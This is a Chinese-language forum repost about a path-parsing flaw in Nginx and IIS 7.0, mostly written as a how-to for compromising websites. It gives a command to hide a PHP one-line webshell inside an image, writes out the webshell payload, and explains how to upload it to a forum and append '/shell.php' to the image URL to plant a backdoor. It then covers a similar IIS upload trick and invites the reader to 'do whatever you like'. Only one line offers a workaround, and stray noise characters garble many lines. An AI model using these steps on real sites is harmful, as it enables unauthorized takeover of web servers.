IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 5 }: r @4 R- ~, u$ y! V/ {
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
4 i4 |9 k- t( E; Z! I8 Q2 e( ___________________________________
. V# A& }1 w+ Q2 ?/ w& g6 }7 _" I0 }4 I5 M9 y8 p
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) " C$ X5 j2 ^7 j8 U8 n- d
先合并一张PHP一句话图片马,合并方法:
, ]% X5 v! j" L9 Y①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
( Z: a( E: F8 ~6 o# s0 t" u" X②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
' k$ I. R5 h% V) [图片随便找一张.
, r# @+ S8 i# h" m一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> ; Y7 ^8 A# Z, S! B2 t2 L+ _9 D: H
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 I& j3 Z" x2 |6 a6 J
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
7 T6 s/ M: R1 R0 d比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
2 P3 u1 K* ~/ U* b ~则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php, ]3 g8 f: s: V2 ?; Z) L/ @. j( U
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
6 o+ w* E5 P _8 F; i) Nshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 ; X5 S( M; }3 [$ L
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 ; T2 p. n, K2 ~- ?% w
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 ! x6 u7 P8 M& {8 q# J0 `
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
2 `* o0 W* x8 s+ u5 g- |! d剩下的就随便你去搞吧。& R+ t5 i, D% f0 ]
& ^+ [+ Q! v' t& J. G |